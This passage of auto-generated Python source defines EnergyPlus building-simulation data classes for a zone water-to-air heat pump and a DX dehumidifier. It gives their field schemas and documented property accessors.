"""field `Maximum Outdoor Dry-Bulb Temperature for Supplemental Heater Operation`
| Supplemental heater will not operate when outdoor temperature exceeds this value.
| Units: C
| Default value: 21.0
| value <= 21.0
Args:
value (float): value for IDD Field `Maximum Outdoor Dry-Bulb Temperature for Supplemental Heater Operation`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `maximum_outdoor_drybulb_temperature_for_supplemental_heater_operation` or None if not set
"""
return self[
"Maximum Outdoor Dry-Bulb Temperature for Supplemental Heater Operation"]
@maximum_outdoor_drybulb_temperature_for_supplemental_heater_operation.setter
def maximum_outdoor_drybulb_temperature_for_supplemental_heater_operation(
self,
value=21.0):
""" Corresponds to IDD field `Maximum Outdoor Dry-Bulb Temperature for Supplemental Heater Operation`
"""
self[
"Maximum Outdoor Dry-Bulb Temperature for Supplemental Heater Operation"] = value
@property
def fan_placement(self):
"""field `Fan Placement`
| Select fan placement as either blow through or draw through.
| Default value: DrawThrough
Args:
value (str): value for IDD Field `Fan Placement`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `fan_placement` or None if not set
"""
return self["Fan Placement"]
@fan_placement.setter
def fan_placement(self, value="DrawThrough"):
"""Corresponds to IDD field `Fan Placement`"""
self["Fan Placement"] = value
@property
def supply_air_fan_operating_mode_schedule_name(self):
"""field `Supply Air Fan Operating Mode Schedule Name`
| Enter the name of a schedule that controls fan operation. Schedule values of 0 denote
| cycling fan operation (fan cycles with cooling or heating coil). Schedule Name values greater
| than 0 denote constant fan operation (fan runs continually regardless of coil operation).
| The fan operating mode defaults to cycling fan operation if this field is left blank.
Args:
value (str): value for IDD Field `Supply Air Fan Operating Mode Schedule Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `supply_air_fan_operating_mode_schedule_name` or None if not set
"""
return self["Supply Air Fan Operating Mode Schedule Name"]
@supply_air_fan_operating_mode_schedule_name.setter
def supply_air_fan_operating_mode_schedule_name(self, value=None):
"""Corresponds to IDD field `Supply Air Fan Operating Mode Schedule
Name`"""
self["Supply Air Fan Operating Mode Schedule Name"] = value
@property
def availability_manager_list_name(self):
"""field `Availability Manager List Name`
| Enter the name of an AvailabilityManagerAssignmentList object.
Args:
value (str): value for IDD Field `Availability Manager List Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `availability_manager_list_name` or None if not set
"""
return self["Availability Manager List Name"]
@availability_manager_list_name.setter
def availability_manager_list_name(self, value=None):
"""Corresponds to IDD field `Availability Manager List Name`"""
self["Availability Manager List Name"] = value
@property
def design_specification_zonehvac_sizing_object_name(self):
"""field `Design Specification ZoneHVAC Sizing Object Name`
| Enter the name of a DesignSpecificationZoneHVACSizing object.
Args:
value (str): value for IDD Field `Design Specification ZoneHVAC Sizing Object Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `design_specification_zonehvac_sizing_object_name` or None if not set
"""
return self["Design Specification ZoneHVAC Sizing Object Name"]
@design_specification_zonehvac_sizing_object_name.setter
def design_specification_zonehvac_sizing_object_name(self, value=None):
"""Corresponds to IDD field `Design Specification ZoneHVAC Sizing
Object Name`"""
self["Design Specification ZoneHVAC Sizing Object Name"] = value
class ZoneHvacWaterToAirHeatPump(DataObject):
""" Corresponds to IDD object `ZoneHVAC:WaterToAirHeatPump`
Water-to-air heat pump. Forced-convection heating-cooling unit with supply fan,
water-to-air cooling and heating coils, supplemental heating coil (gas, electric, hot
water, or steam), and fixed-position outdoor air mixer.
"""
_schema = {'extensible-fields': OrderedDict(),
'fields': OrderedDict([(u'name',
{'name': u'Name',
'pyname': u'name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'alpha'}),
(u'availability schedule name',
{'name': u'Availability Schedule Name',
'pyname': u'availability_schedule_name',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'air inlet node name',
{'name': u'Air Inlet Node Name',
'pyname': u'air_inlet_node_name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'node'}),
(u'air outlet node name',
{'name': u'Air Outlet Node Name',
'pyname': u'air_outlet_node_name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'node'}),
(u'outdoor air mixer object type',
{'name': u'Outdoor Air Mixer Object Type',
'pyname': u'outdoor_air_mixer_object_type',
'required-field': False,
'autosizable': False,
'accepted-values': [u'OutdoorAir:Mixer'],
'autocalculatable': False,
'type': 'alpha'}),
(u'outdoor air mixer name',
{'name': u'Outdoor Air Mixer Name',
'pyname': u'outdoor_air_mixer_name',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'cooling supply air flow rate',
{'name': u'Cooling Supply Air Flow Rate',
'pyname': u'cooling_supply_air_flow_rate',
'minimum>': 0.0,
'required-field': True,
'autosizable': True,
'autocalculatable': False,
'type': u'real',
'unit': u'm3/s'}),
(u'heating supply air flow rate',
{'name': u'Heating Supply Air Flow Rate',
'pyname': u'heating_supply_air_flow_rate',
'minimum>': 0.0,
'required-field': True,
'autosizable': True,
'autocalculatable': False,
'type': u'real',
'unit': u'm3/s'}),
(u'no load supply air flow rate',
{'name': u'No Load Supply Air Flow Rate',
'pyname': u'no_load_supply_air_flow_rate',
'required-field': False,
'autosizable': True,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real',
'unit': u'm3/s'}),
(u'cooling outdoor air flow rate',
{'name': u'Cooling Outdoor Air Flow Rate',
'pyname': u'cooling_outdoor_air_flow_rate',
'required-field': True,
'autosizable': True,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real',
'unit': u'm3/s'}),
(u'heating outdoor air flow rate',
{'name': u'Heating Outdoor Air Flow Rate',
'pyname': u'heating_outdoor_air_flow_rate',
'required-field': True,
'autosizable': True,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real',
'unit': u'm3/s'}),
(u'no load outdoor air flow rate',
{'name': u'No Load Outdoor Air Flow Rate',
'pyname': u'no_load_outdoor_air_flow_rate',
'required-field': False,
'autosizable': True,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real',
'unit': u'm3/s'}),
(u'supply air fan object type',
{'name': u'Supply Air Fan Object Type',
'pyname': u'supply_air_fan_object_type',
'required-field': True,
'autosizable': False,
'accepted-values': [u'Fan:OnOff'],
'autocalculatable': False,
'type': 'alpha'}),
(u'supply air fan name',
{'name': u'Supply Air Fan Name',
'pyname': u'supply_air_fan_name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'heating coil object type',
{'name': u'Heating Coil Object Type',
'pyname': u'heating_coil_object_type',
'required-field': True,
'autosizable': False,
'accepted-values': [u'Coil:Heating:WaterToAirHeatPump:EquationFit',
u'Coil:Heating:WaterToAirHeatPump:VariableSpeedEquationFit'],
'autocalculatable': False,
'type': 'alpha'}),
(u'heating coil name',
{'name': u'Heating Coil Name',
'pyname': u'heating_coil_name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'cooling coil object type',
{'name': u'Cooling Coil Object Type',
'pyname': u'cooling_coil_object_type',
'required-field': True,
'autosizable': False,
'accepted-values': [u'Coil:Cooling:WaterToAirHeatPump:EquationFit',
u'Coil:Cooling:WaterToAirHeatPump:VariableSpeedEquationFit'],
'autocalculatable': False,
'type': 'alpha'}),
(u'cooling coil name',
{'name': u'Cooling Coil Name',
'pyname': u'cooling_coil_name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'maximum cycling rate',
{'name': u'Maximum Cycling Rate',
'pyname': u'maximum_cycling_rate',
'default': 2.5,
'maximum': 5.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real',
'unit': u'cycles/hr'}),
(u'heat pump time constant',
{'name': u'Heat Pump Time Constant',
'pyname': u'heat_pump_time_constant',
'default': 60.0,
'maximum': 500.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real',
'unit': u's'}),
(u'fraction of on-cycle power use',
{'name': u'Fraction of On-Cycle Power Use',
'pyname': u'fraction_of_oncycle_power_use',
'default': 0.01,
'maximum': 0.05,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real'}),
(u'heat pump fan delay time',
{'name': u'Heat Pump Fan Delay Time',
'pyname': u'heat_pump_fan_delay_time',
'default': 60.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u's'}),
(u'supplemental heating coil object type',
{'name': u'Supplemental Heating Coil Object Type',
'pyname': u'supplemental_heating_coil_object_type',
'required-field': True,
'autosizable': False,
'accepted-values': [u'Coil:Heating:Gas',
u'Coil:Heating:Electric',
u'Coil:Heating:Water',
u'Coil:Heating:Steam'],
'autocalculatable': False,
'type': 'alpha'}),
(u'supplemental heating coil name',
{'name': u'Supplemental Heating Coil Name',
'pyname': u'supplemental_heating_coil_name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'maximum supply air temperature from supplemental heater',
{'name': u'Maximum Supply Air Temperature from Supplemental Heater',
'pyname': u'maximum_supply_air_temperature_from_supplemental_heater',
'required-field': True,
'autosizable': True,
'autocalculatable': False,
'type': u'real',
'unit': u'C'}),
(u'maximum outdoor dry-bulb temperature for supplemental heater operation',
{'name': u'Maximum Outdoor Dry-Bulb Temperature for Supplemental Heater Operation',
'pyname': u'maximum_outdoor_drybulb_temperature_for_supplemental_heater_operation',
'default': 21.0,
'maximum': 21.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'C'}),
(u'outdoor dry-bulb temperature sensor node name',
{'name': u'Outdoor Dry-Bulb Temperature Sensor Node Name',
'pyname': u'outdoor_drybulb_temperature_sensor_node_name',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'node'}),
(u'fan placement',
{'name': u'Fan Placement',
'pyname': u'fan_placement',
'default': u'BlowThrough',
'required-field': False,
'autosizable': False,
'accepted-values': [u'BlowThrough',
u'DrawThrough'],
'autocalculatable': False,
'type': 'alpha'}),
(u'supply air fan operating mode schedule name',
{'name': u'Supply Air Fan Operating Mode Schedule Name',
'pyname': u'supply_air_fan_operating_mode_schedule_name',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'availability manager list name',
{'name': u'Availability Manager List Name',
'pyname': u'availability_manager_list_name',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'heat pump coil water flow mode',
{'name': u'Heat Pump Coil Water Flow Mode',
'pyname': u'heat_pump_coil_water_flow_mode',
'default': u'Cycling',
'required-field': False,
'autosizable': False,
'accepted-values': [u'Constant',
u'Cycling',
u'ConstantOnDemand'],
'autocalculatable': False,
'type': 'alpha'}),
(u'design specification zonehvac sizing object name',
{'name': u'Design Specification ZoneHVAC Sizing Object Name',
'pyname': u'design_specification_zonehvac_sizing_object_name',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'})]),
'format': None,
'group': u'Zone HVAC Forced Air Units',
'min-fields': 25,
'name': u'ZoneHVAC:WaterToAirHeatPump',
'pyname': u'ZoneHvacWaterToAirHeatPump',
'required-object': False,
'unique-object': False}
@property
def name(self):
"""field `Name`
Args:
value (str): value for IDD Field `Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `name` or None if not set
"""
return self["Name"]
@name.setter
def name(self, value=None):
"""Corresponds to IDD field `Name`"""
self["Name"] = value
@property
def availability_schedule_name(self):
"""field `Availability Schedule Name`
| Availability schedule name for this system. Schedule value > 0 means the system is available.
| If this field is blank, the system is always available.
Args:
value (str): value for IDD Field `Availability Schedule Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `availability_schedule_name` or None if not set
"""
return self["Availability Schedule Name"]
@availability_schedule_name.setter
def availability_schedule_name(self, value=None):
"""Corresponds to IDD field `Availability Schedule Name`"""
self["Availability Schedule Name"] = value
@property
def air_inlet_node_name(self):
"""field `Air Inlet Node Name`
Args:
value (str): value for IDD Field `Air Inlet Node Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `air_inlet_node_name` or None if not set
"""
return self["Air Inlet Node Name"]
@air_inlet_node_name.setter
def air_inlet_node_name(self, value=None):
"""Corresponds to IDD field `Air Inlet Node Name`"""
self["Air Inlet Node Name"] = value
@property
def air_outlet_node_name(self):
"""field `Air Outlet Node Name`
Args:
value (str): value for IDD Field `Air Outlet Node Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `air_outlet_node_name` or None if not set
"""
return self["Air Outlet Node Name"]
@air_outlet_node_name.setter
def air_outlet_node_name(self, value=None):
"""Corresponds to IDD field `Air Outlet Node Name`"""
self["Air Outlet Node Name"] = value
@property
def outdoor_air_mixer_object_type(self):
"""field `Outdoor Air Mixer Object Type`
| currently only one OutdoorAir:Mixer object type is available.
Args:
value (str): value for IDD Field `Outdoor Air Mixer Object Type`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `outdoor_air_mixer_object_type` or None if not set
"""
return self["Outdoor Air Mixer Object Type"]
@outdoor_air_mixer_object_type.setter
def outdoor_air_mixer_object_type(self, value=None):
"""Corresponds to IDD field `Outdoor Air Mixer Object Type`"""
self["Outdoor Air Mixer Object Type"] = value
@property
def outdoor_air_mixer_name(self):
"""field `Outdoor Air Mixer Name`
| This optional field specifies the name of the outdoor air mixer object.
| When used, this name needs to match name of outdoor air mixer object.
Args:
value (str): value for IDD Field `Outdoor Air Mixer Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `outdoor_air_mixer_name` or None if not set
"""
return self["Outdoor Air Mixer Name"]
@outdoor_air_mixer_name.setter
def outdoor_air_mixer_name(self, value=None):
"""Corresponds to IDD field `Outdoor Air Mixer Name`"""
self["Outdoor Air Mixer Name"] = value
@property
def cooling_supply_air_flow_rate(self):
"""field `Cooling Supply Air Flow Rate`
| Must be less than or equal to fan size.
| Units: m3/s
Args:
value (float or "Autosize"): value for IDD Field `Cooling Supply Air Flow Rate`
Raises:
ValueError: if `value` is not a valid value
Returns:
float or "Autosize": the value of `cooling_supply_air_flow_rate` or None if not set
"""
return self["Cooling Supply Air Flow Rate"]
@cooling_supply_air_flow_rate.setter
def cooling_supply_air_flow_rate(self, value=None):
"""Corresponds to IDD field `Cooling Supply Air Flow Rate`"""
self["Cooling Supply Air Flow Rate"] = value
@property
def heating_supply_air_flow_rate(self):
"""field `Heating Supply Air Flow Rate`
| Must be less than or equal to fan size.
| Units: m3/s
Args:
value (float or "Autosize"): value for IDD Field `Heating Supply Air Flow Rate`
Raises:
ValueError: if `value` is not a valid value
Returns:
float or "Autosize": the value of `heating_supply_air_flow_rate` or None if not set
"""
return self["Heating Supply Air Flow Rate"]
@heating_supply_air_flow_rate.setter
def heating_supply_air_flow_rate(self, value=None):
"""Corresponds to IDD field `Heating Supply Air Flow Rate`"""
self["Heating Supply Air Flow Rate"] = value
@property
def no_load_supply_air_flow_rate(self):
"""field `No Load Supply Air Flow Rate`
| Must be less than or equal to fan size.
| Only used when heat pump fan operating mode is continuous. This air flow rate
| is used when no heating or cooling is required and the DX coil compressor is off.
| If this field is left blank or zero, the supply air flow rate from the previous on cycle
| (either cooling or heating) is used.
| Units: m3/s
Args:
value (float or "Autosize"): value for IDD Field `No Load Supply Air Flow Rate`
Raises:
ValueError: if `value` is not a valid value
Returns:
float or "Autosize": the value of `no_load_supply_air_flow_rate` or None if not set
"""
return self["No Load Supply Air Flow Rate"]
@no_load_supply_air_flow_rate.setter
def no_load_supply_air_flow_rate(self, value=None):
"""Corresponds to IDD field `No Load Supply Air Flow Rate`"""
self["No Load Supply Air Flow Rate"] = value
@property
def cooling_outdoor_air_flow_rate(self):
"""field `Cooling Outdoor Air Flow Rate`
| Must be less than or equal to supply air flow rate during cooling operation.
| Units: m3/s
Args:
value (float or "Autosize"): value for IDD Field `Cooling Outdoor Air Flow Rate`
Raises:
ValueError: if `value` is not a valid value
Returns:
float or "Autosize": the value of `cooling_outdoor_air_flow_rate` or None if not set
"""
return self["Cooling Outdoor Air Flow Rate"]
@cooling_outdoor_air_flow_rate.setter
def cooling_outdoor_air_flow_rate(self, value=None):
"""Corresponds to IDD field `Cooling Outdoor Air Flow Rate`"""
self["Cooling Outdoor Air Flow Rate"] = value
@property
def heating_outdoor_air_flow_rate(self):
"""field `Heating Outdoor Air Flow Rate`
| Must be less than or equal to supply air flow rate during heating operation.
| Units: m3/s
Args:
value (float or "Autosize"): value for IDD Field `Heating Outdoor Air Flow Rate`
Raises:
ValueError: if `value` is not a valid value
Returns:
float or "Autosize": the value of `heating_outdoor_air_flow_rate` or None if not set
"""
return self["Heating Outdoor Air Flow Rate"]
@heating_outdoor_air_flow_rate.setter
def heating_outdoor_air_flow_rate(self, value=None):
"""Corresponds to IDD field `Heating Outdoor Air Flow Rate`"""
self["Heating Outdoor Air Flow Rate"] = value
@property
def no_load_outdoor_air_flow_rate(self):
"""field `No Load Outdoor Air Flow Rate`
| Only used when heat pump Fan operating mode is continuous. This air flow rate
| is used when no heating or cooling is required and the DX coil compressor is off.
| If this field is left blank or zero, the outdoor air flow rate from the previous on cycle
| (either cooling or heating) is used.
| Units: m3/s
Args:
value (float or "Autosize"): value for IDD Field `No Load Outdoor Air Flow Rate`
Raises:
ValueError: if `value` is not a valid value
Returns:
float or "Autosize": the value of `no_load_outdoor_air_flow_rate` or None if not set
"""
return self["No Load Outdoor Air Flow Rate"]
@no_load_outdoor_air_flow_rate.setter
def no_load_outdoor_air_flow_rate(self, value=None):
"""Corresponds to IDD field `No Load Outdoor Air Flow Rate`"""
self["No Load Outdoor Air Flow Rate"] = value
@property
def supply_air_fan_object_type(self):
"""field `Supply Air Fan Object Type`
| Only works with On/Off Fan
Args:
value (str): value for IDD Field `Supply Air Fan Object Type`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `supply_air_fan_object_type` or None if not set
"""
return self["Supply Air Fan Object Type"]
@supply_air_fan_object_type.setter
def supply_air_fan_object_type(self, value=None):
"""Corresponds to IDD field `Supply Air Fan Object Type`"""
self["Supply Air Fan Object Type"] = value
@property
def supply_air_fan_name(self):
"""field `Supply Air Fan Name`
| Needs to match Fan:OnOff object
Args:
value (str): value for IDD Field `Supply Air Fan Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `supply_air_fan_name` or None if not set
"""
return self["Supply Air Fan Name"]
@supply_air_fan_name.setter
def supply_air_fan_name(self, value=None):
"""Corresponds to IDD field `Supply Air Fan Name`"""
self["Supply Air Fan Name"] = value
@property
def heating_coil_object_type(self):
"""field `Heating Coil Object Type`
Args:
value (str): value for IDD Field `Heating Coil Object Type`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `heating_coil_object_type` or None if not set
"""
return self["Heating Coil Object Type"]
@heating_coil_object_type.setter
def heating_coil_object_type(self, value=None):
"""Corresponds to IDD field `Heating Coil Object Type`"""
self["Heating Coil Object Type"] = value
@property
def heating_coil_name(self):
"""field `Heating Coil Name`
| Needs to match in the water-to-air heat pump heating coil object
Args:
value (str): value for IDD Field `Heating Coil Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `heating_coil_name` or None if not set
"""
return self["Heating Coil Name"]
@heating_coil_name.setter
def heating_coil_name(self, value=None):
"""Corresponds to IDD field `Heating Coil Name`"""
self["Heating Coil Name"] = value
@property
def cooling_coil_object_type(self):
"""field `Cooling Coil Object Type`
Args:
value (str): value for IDD Field `Cooling Coil Object Type`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `cooling_coil_object_type` or None if not set
"""
return self["Cooling Coil Object Type"]
@cooling_coil_object_type.setter
def cooling_coil_object_type(self, value=None):
"""Corresponds to IDD field `Cooling Coil Object Type`"""
self["Cooling Coil Object Type"] = value
@property
def cooling_coil_name(self):
"""field `Cooling Coil Name`
| Needs to match in the water-to-air heat pump cooling coil object
Args:
value (str): value for IDD Field `Cooling Coil Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `cooling_coil_name` or None if not set
"""
return self["Cooling Coil Name"]
@cooling_coil_name.setter
def cooling_coil_name(self, value=None):
"""Corresponds to IDD field `Cooling Coil Name`"""
self["Cooling Coil Name"] = value
@property
def maximum_cycling_rate(self):
"""field `Maximum Cycling Rate`
| The maximum on-off cycling rate for the compressor
| Suggested value is 2.5 for a typical heat pump
| Units: cycles/hr
| Default value: 2.5
| value <= 5.0
Args:
value (float): value for IDD Field `Maximum Cycling Rate`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `maximum_cycling_rate` or None if not set
"""
return self["Maximum Cycling Rate"]
@maximum_cycling_rate.setter
def maximum_cycling_rate(self, value=2.5):
"""Corresponds to IDD field `Maximum Cycling Rate`"""
self["Maximum Cycling Rate"] = value
@property
def heat_pump_time_constant(self):
"""field `Heat Pump Time Constant`
| Time constant for the cooling coil's capacity to reach steady state after startup
| Suggested value is 60 for a typical heat pump
| Units: s
| Default value: 60.0
| value <= 500.0
Args:
value (float): value for IDD Field `Heat Pump Time Constant`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `heat_pump_time_constant` or None if not set
"""
return self["Heat Pump Time Constant"]
@heat_pump_time_constant.setter
def heat_pump_time_constant(self, value=60.0):
"""Corresponds to IDD field `Heat Pump Time Constant`"""
self["Heat Pump Time Constant"] = value
@property
def fraction_of_oncycle_power_use(self):
"""field `Fraction of On-Cycle Power Use`
| The fraction of on-cycle power use to adjust the part load fraction based on
| the off-cycle power consumption due to crankcase heaters, controls, fans, and etc.
| Suggested value is 0.01 for a typical heat pump
| Default value: 0.01
| value <= 0.05
Args:
value (float): value for IDD Field `Fraction of On-Cycle Power Use`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `fraction_of_oncycle_power_use` or None if not set
"""
return self["Fraction of On-Cycle Power Use"]
@fraction_of_oncycle_power_use.setter
def fraction_of_oncycle_power_use(self, value=0.01):
""" Corresponds to IDD field `Fraction of On-Cycle Power Use`
"""
self["Fraction of On-Cycle Power Use"] = value
@property
def heat_pump_fan_delay_time(self):
"""field `Heat Pump Fan Delay Time`
| Programmed time delay for heat pump fan to shut off after compressor cycle off.
| Only required when fan operating mode is cycling
| Enter 0 when fan operating mode is continuous
| Units: s
| Default value: 60.0
Args:
value (float): value for IDD Field `Heat Pump Fan Delay Time`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `heat_pump_fan_delay_time` or None if not set
"""
return self["Heat Pump Fan Delay Time"]
@heat_pump_fan_delay_time.setter
def heat_pump_fan_delay_time(self, value=60.0):
"""Corresponds to IDD field `Heat Pump Fan Delay Time`"""
self["Heat Pump Fan Delay Time"] = value
@property
def supplemental_heating_coil_object_type(self):
"""field `Supplemental Heating Coil Object Type`
| works with gas, electric, hot water and steam heating coils
Args:
value (str): value for IDD Field `Supplemental Heating Coil Object Type`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `supplemental_heating_coil_object_type` or None if not set
"""
return self["Supplemental Heating Coil Object Type"]
@supplemental_heating_coil_object_type.setter
def supplemental_heating_coil_object_type(self, value=None):
"""Corresponds to IDD field `Supplemental Heating Coil Object Type`"""
self["Supplemental Heating Coil Object Type"] = value
@property
def supplemental_heating_coil_name(self):
"""field `Supplemental Heating Coil Name`
| Needs to match in the supplemental heating coil object
Args:
value (str): value for IDD Field `Supplemental Heating Coil Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `supplemental_heating_coil_name` or None if not set
"""
return self["Supplemental Heating Coil Name"]
@supplemental_heating_coil_name.setter
def supplemental_heating_coil_name(self, value=None):
"""Corresponds to IDD field `Supplemental Heating Coil Name`"""
self["Supplemental Heating Coil Name"] = value
@property
def maximum_supply_air_temperature_from_supplemental_heater(self):
"""field `Maximum Supply Air Temperature from Supplemental Heater`
| Units: C
Args:
value (float or "Autosize"): value for IDD Field `Maximum Supply Air Temperature from Supplemental Heater`
Raises:
ValueError: if `value` is not a valid value
Returns:
float or "Autosize": the value of `maximum_supply_air_temperature_from_supplemental_heater` or None if not set
"""
return self["Maximum Supply Air Temperature from Supplemental Heater"]
@maximum_supply_air_temperature_from_supplemental_heater.setter
def maximum_supply_air_temperature_from_supplemental_heater(
self,
value=None):
"""Corresponds to IDD field `Maximum Supply Air Temperature from
Supplemental Heater`"""
self["Maximum Supply Air Temperature from Supplemental Heater"] = value
@property
def maximum_outdoor_drybulb_temperature_for_supplemental_heater_operation(
self):
"""field `Maximum Outdoor Dry-Bulb Temperature for Supplemental Heater Operation`
| Units: C
| Default value: 21.0
| value <= 21.0
Args:
value (float): value for IDD Field `Maximum Outdoor Dry-Bulb Temperature for Supplemental Heater Operation`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `maximum_outdoor_drybulb_temperature_for_supplemental_heater_operation` or None if not set
"""
return self[
"Maximum Outdoor Dry-Bulb Temperature for Supplemental Heater Operation"]
@maximum_outdoor_drybulb_temperature_for_supplemental_heater_operation.setter
def maximum_outdoor_drybulb_temperature_for_supplemental_heater_operation(
self,
value=21.0):
""" Corresponds to IDD field `Maximum Outdoor Dry-Bulb Temperature for Supplemental Heater Operation`
"""
self[
"Maximum Outdoor Dry-Bulb Temperature for Supplemental Heater Operation"] = value
@property
def outdoor_drybulb_temperature_sensor_node_name(self):
"""field `Outdoor Dry-Bulb Temperature Sensor Node Name`
Args:
value (str): value for IDD Field `Outdoor Dry-Bulb Temperature Sensor Node Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `outdoor_drybulb_temperature_sensor_node_name` or None if not set
"""
return self["Outdoor Dry-Bulb Temperature Sensor Node Name"]
@outdoor_drybulb_temperature_sensor_node_name.setter
def outdoor_drybulb_temperature_sensor_node_name(self, value=None):
""" Corresponds to IDD field `Outdoor Dry-Bulb Temperature Sensor Node Name`
"""
self["Outdoor Dry-Bulb Temperature Sensor Node Name"] = value
@property
def fan_placement(self):
"""field `Fan Placement`
| Default value: BlowThrough
Args:
value (str): value for IDD Field `Fan Placement`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `fan_placement` or None if not set
"""
return self["Fan Placement"]
@fan_placement.setter
def fan_placement(self, value="BlowThrough"):
"""Corresponds to IDD field `Fan Placement`"""
self["Fan Placement"] = value
@property
def supply_air_fan_operating_mode_schedule_name(self):
"""field `Supply Air Fan Operating Mode Schedule Name`
| Enter the name of a schedule that controls fan operation. Schedule values of 0 denote
| cycling fan operation (fan cycles with cooling or heating coil). Schedule values greater
| than 0 denote constant fan operation (fan runs continually regardless of coil operation).
| The fan operating mode defaults to cycling fan operation if this field is left blank.
Args:
value (str): value for IDD Field `Supply Air Fan Operating Mode Schedule Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `supply_air_fan_operating_mode_schedule_name` or None if not set
"""
return self["Supply Air Fan Operating Mode Schedule Name"]
@supply_air_fan_operating_mode_schedule_name.setter
def supply_air_fan_operating_mode_schedule_name(self, value=None):
"""Corresponds to IDD field `Supply Air Fan Operating Mode Schedule
Name`"""
self["Supply Air Fan Operating Mode Schedule Name"] = value
@property
def availability_manager_list_name(self):
"""field `Availability Manager List Name`
| Enter the name of an AvailabilityManagerAssignmentList object.
Args:
value (str): value for IDD Field `Availability Manager List Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `availability_manager_list_name` or None if not set
"""
return self["Availability Manager List Name"]
@availability_manager_list_name.setter
def availability_manager_list_name(self, value=None):
"""Corresponds to IDD field `Availability Manager List Name`"""
self["Availability Manager List Name"] = value
@property
def heat_pump_coil_water_flow_mode(self):
"""field `Heat Pump Coil Water Flow Mode`
| used only when the heat pump coils are of the type WaterToAirHeatPump:EquationFit
| Constant results in 100% water flow regardless of compressor PLR
| Cycling results in water flow that matches compressor PLR
| ConstantOnDemand results in 100% water flow whenever the coil is on, but is 0% whenever the coil has no load
| Default value: Cycling
Args:
value (str): value for IDD Field `Heat Pump Coil Water Flow Mode`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `heat_pump_coil_water_flow_mode` or None if not set
"""
return self["Heat Pump Coil Water Flow Mode"]
@heat_pump_coil_water_flow_mode.setter
def heat_pump_coil_water_flow_mode(self, value="Cycling"):
"""Corresponds to IDD field `Heat Pump Coil Water Flow Mode`"""
self["Heat Pump Coil Water Flow Mode"] = value
@property
def design_specification_zonehvac_sizing_object_name(self):
"""field `Design Specification ZoneHVAC Sizing Object Name`
| Enter the name of a DesignSpecificationZoneHVACSizing object.
Args:
value (str): value for IDD Field `Design Specification ZoneHVAC Sizing Object Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `design_specification_zonehvac_sizing_object_name` or None if not set
"""
return self["Design Specification ZoneHVAC Sizing Object Name"]
@design_specification_zonehvac_sizing_object_name.setter
def design_specification_zonehvac_sizing_object_name(self, value=None):
"""Corresponds to IDD field `Design Specification ZoneHVAC Sizing
Object Name`"""
self["Design Specification ZoneHVAC Sizing Object Name"] = value
class ZoneHvacDehumidifierDx(DataObject):
""" Corresponds to IDD object `ZoneHVAC:Dehumidifier:DX`
This object calculates the performance of zone (room) air dehumidifiers.
Meant to model conventional direct expansion (DX) cooling-based room air
dehumidifiers (reject 100% of condenser heat to the zone air), but this
object might be able to be used to model other room air dehumidifier types.
"""
_schema = {'extensible-fields': OrderedDict(),
'fields': OrderedDict([(u'name',
{'name': u'Name',
'pyname': u'name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'alpha'}),
(u'availability schedule name',
{'name': u'Availability Schedule Name',
'pyname': u'availability_schedule_name',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
